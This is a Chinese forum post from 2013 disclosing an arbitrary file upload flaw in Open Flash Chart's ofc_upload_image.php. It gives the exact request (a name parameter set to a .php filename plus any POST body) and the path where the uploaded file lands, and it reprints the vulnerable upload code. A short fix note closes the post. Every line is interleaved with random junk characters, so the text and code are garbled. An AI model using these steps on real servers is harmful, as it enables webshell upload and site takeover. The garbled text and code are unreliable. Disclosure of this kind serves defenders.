POST 数据漏洞文件执行任意后缀文件保存- b, D" x, M3 @4 O8 k; H$ ~6 ]
漏洞文件/chart/php-ofc-library/ofc_upload_image.php, w, @9 m6 J3 ~2 m" Q8 h+ z5 G! H
! D$ S) _9 |6 B) K4 u1 l. m$ h' m
利用:# |6 R' T! @% d8 Y+ |
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
' f/ i. `. @0 G8 [; r
' U2 B/ ?) b; M: O$ rPost任意数据, G2 z* l' Q5 ]4 P
保存位置http://localhost/chart/tmp-upload-images/hfy.php8 h* C. {6 L: A7 b- x$ t# J- x
' M8 n, H6 Z" G' G
0 ^. J+ F- u/ c' Z" ~" A' a
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
# l9 T& N9 P. L# |, |
( p: h) B, f! D: ^$ r8 @: Q<?php' B( y3 U6 ~6 C7 W o
' K$ }9 ]8 n" [: V$ ~1 f//
) B& a% y# n: h9 A- ?// In Open Flash Chart -> save_image debug mode, you
* G; z* Y8 M' T2 M& ~# Y* A& |// will see the 'echo' text in a new window.
; Y# z- B9 L y( e2 u8 ^//9 l2 g8 i% x& I$ U% U
9 O: x2 ]! T+ s5 ^
/*
% Q$ k" F% W, _2 b: R. Q
. ]2 T7 b' h; J0 v% Pprint_r( $_GET );
, h# p& j4 ^1 uprint_r( $_POST );
& U, }+ H% E: \3 G8 o$ B% Cprint_r( $_FILES );7 d% X( f1 q" x S1 {0 @
5 E; x9 }2 F# P) n6 v" h; [& Q$ E
print_r( $GLOBALS );
! k. k6 f# W E7 C5 U6 ^8 Xprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );: ~% k V1 d+ s9 ^) u
) ?# h8 W4 e. Q! y" [. O*/ }3 K" ~5 D9 d
// default path for the image to be stored // y' g& z6 t% o
$default_path = '../tmp-upload-images/';
% K4 f2 C& x# x9 X' b2 _1 L5 `9 V1 e% h6 [, J! R
if (!file_exists($default_path)) mkdir($default_path, 0777, true);, E1 _, v3 }) \4 S- u! ^
+ c0 p7 }) x: K
// full path to the saved image including filename //
* Y% S: f0 |: s9 q: U9 D$destination = $default_path . basename( $_GET[ 'name' ] );
' V; O8 M/ I$ M9 N1 _& I* u) \9 V3 B, P: T
echo 'Saving your image to: '. $destination;
3 i. b2 C6 t6 J// print_r( $_POST );
& Z# w1 Q& w1 U/ \; C+ L: \1 r/ U// print_r( $_SERVER );
6 o+ ?) {/ E4 U// echo $HTTP_RAW_POST_DATA;5 o' @" ]1 z( @% D7 D( d( \. M9 [
. W: N% N' u8 [, j2 S. K( ]//, N! e5 }( a( B
// POST data is usually string data, but we are passing a RAW .png) }8 v) n5 m; m% I5 n9 G( Q
// so PHP is a bit confused and $_POST is empty. But it has saved
6 y3 f; N X' p- J* m// the raw bits into $HTTP_RAW_POST_DATA' G* h* T5 Z0 u" N( R
//4 n0 j) h: N# {3 h
/ N2 W- _( m- C$jfh = fopen($destination, 'w') or die("can't open file");9 u: Y1 L: Y) {3 Z: a* f+ k
fwrite($jfh, $HTTP_RAW_POST_DATA);
2 q* p6 ^2 e5 c8 T+ w8 X% yfclose($jfh);
" z/ B% b# i. L% q2 T# F7 O. f! H: e
//0 E: c: T2 E& h
// LOOK:
9 A0 R+ q. I% }8 U n: _//, D q) C! ~5 v" ]
exit();; k$ p+ N- E# |% ]. a' C
//* D0 r G. [6 e+ F. M% ?3 }. N& |
// PHP5:' |3 J6 W5 u. b5 z7 t
//
8 L2 z8 s2 E$ F3 I
- |6 D3 u8 t/ F; |$ @. {! u0 J3 w+ I+ n8 G8 Q, O( d4 b
// default path for the image to be stored //
3 O% u9 @8 F$ I1 L# T% `$default_path = 'tmp-upload-images/';
1 c1 P7 Y* u* q: l# H! O& ~4 A+ ~% b0 y* i3 W: u0 p/ n& f
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
* U' y% P. x6 y6 B2 i/ n* I7 }
& X; k! O$ ]3 s1 | ]5 g; l; r// full path to the saved image including filename //1 {, q) z1 w7 y$ x# I% \+ _9 t4 S
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); # L4 D! i0 U, a( J- r( E' o
0 r# Z/ ?) k# m& q) b
// move the image into the specified directory //
4 f) F6 D6 r, z! {; O7 nif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {0 {. L! x# ~2 n& p0 z
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";; e7 U; {, ~$ z" u6 @
} else {! g- b/ e9 m. \8 K/ m5 J- F0 b
echo "FILE UPLOAD FAILED";
7 I8 c. b9 r6 Q# B6 d( c}
& s+ o8 W0 S' b; Y. t5 y/ C. T- I5 z$ ^% X- G: x6 u
+ n2 f4 h& Y! x" [, }
?>
* k1 J& }, `% y- R. ?
9 {% G9 {! f& k
. m5 }* R6 {9 {1 P6 c# _
9 A, [6 z* h/ n( r( s! F7 v2 N/ }9 h1 x Q( c! }* V
/ x% ?- a' v) |7 O5 |& S
+ o, ~% k( o' k) S' r9 @% I修复方案: / o. q1 j, A5 _" v9 \. K
这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
9 K' i5 h& f! N6 i9 Z- w# c. D g1 z" w7 p
7 q' p/ P+ x" f3 F
0 Z8 |4 Q/ e( N) R' H, Z8 N( Y9 |' P
|
发表于 2013-2-23 12:38:58
收藏
支持
反对